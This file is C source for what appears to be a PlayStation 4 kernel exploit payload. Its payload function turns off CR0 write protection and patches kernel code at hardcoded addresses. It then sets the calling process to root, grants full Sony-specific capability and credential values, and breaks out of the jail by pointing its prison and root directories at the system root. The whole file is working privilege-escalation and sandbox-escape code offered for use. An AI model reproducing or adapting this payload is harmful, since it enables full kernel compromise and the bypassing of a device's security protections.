
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


typedef int uint64_t ;
typedef int uint16_t ;
struct ucred {void* cr_prison; scalar_t__* cr_groups; scalar_t__ cr_rgid; scalar_t__ cr_ruid; scalar_t__ cr_uid; } ;
struct thread {TYPE_1__* td_proc; } ;
struct knote {int dummy; } ;
struct TYPE_2__ {struct ucred* p_ucred; } ;


 int X86_CR0_WP ;
 int printfkernel (char*) ;
 int readCr0 () ;
 int writeCr0 (int) ;

void payload(struct knote *kn) {
 struct thread *td;
 struct ucred *cred;


 asm volatile("mov %0, %%gs:0" : "=r"(td));


 uint16_t *securityflags = (uint16_t*)0xFFFFFFFF833242F6;
 *securityflags = *securityflags & ~(1 << 15);


 printfkernel("\n\n\n\n\n\n\n\n\nHello from kernel :-)\n\n\n\n\n\n\n\n\n");


 uint64_t cr0 = readCr0();
 writeCr0(cr0 & ~X86_CR0_WP);


 *(uint16_t *)0xFFFFFFFF82607C46 = 0x9090;
 *(uint16_t *)0xFFFFFFFF82607826 = 0x9090;

 *(char *)0xFFFFFFFF8332431A = 1;
 *(char *)0xFFFFFFFF83324338 = 1;


 writeCr0(cr0);


 cred = td->td_proc->p_ucred;


 cred->cr_uid = 0;
 cred->cr_ruid = 0;
 cred->cr_rgid = 0;
 cred->cr_groups[0] = 0;

 void *td_ucred = *(void **)(((char *)td) + 304);


 uint64_t *sonyCred = (uint64_t *)(((char *)td_ucred) + 96);
 *sonyCred = 0xffffffffffffffff;


 uint64_t *sceProcType = (uint64_t *)(((char *)td_ucred) + 88);
 *sceProcType = 0x3801000000000013;


 uint64_t *sceProcCap = (uint64_t *)(((char *)td_ucred) + 104);
 *sceProcCap = 0xffffffffffffffff;

 ((uint64_t *)0xFFFFFFFF832CC2E8)[0] = 0x123456;
 ((uint64_t *)0xFFFFFFFF8323DA18)[0] = 0;


 cred->cr_prison = (void *)0xFFFFFFFF83237250;


 void *td_fdp = *(void **)(((char *)td->td_proc) + 72);
 uint64_t *td_fdp_fd_rdir = (uint64_t *)(((char *)td_fdp) + 24);
 uint64_t *td_fdp_fd_jdir = (uint64_t *)(((char *)td_fdp) + 32);
 uint64_t *rootvnode = (uint64_t *)0xFFFFFFFF832EF920;
 *td_fdp_fd_rdir = *rootvnode;
 *td_fdp_fd_jdir = *rootvnode;
}
